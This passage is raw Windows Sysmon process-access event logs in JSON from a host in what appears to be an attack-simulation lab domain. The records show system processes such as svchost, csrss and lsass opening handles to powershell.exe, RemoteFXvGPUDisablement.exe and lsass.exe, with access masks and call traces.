ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.459","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":927,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.459\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.459","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":928,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.459\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1240\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2160\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.459","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"1240","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2160","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":929,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.459\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2160\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.459","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2160","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":930,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.459\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2152\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2168\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.459","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2152","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2168","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":931,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.459\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2168\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.459","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2168","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":932,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.490\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.490","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":933,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.490\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.490","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":934,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.490\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.490","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
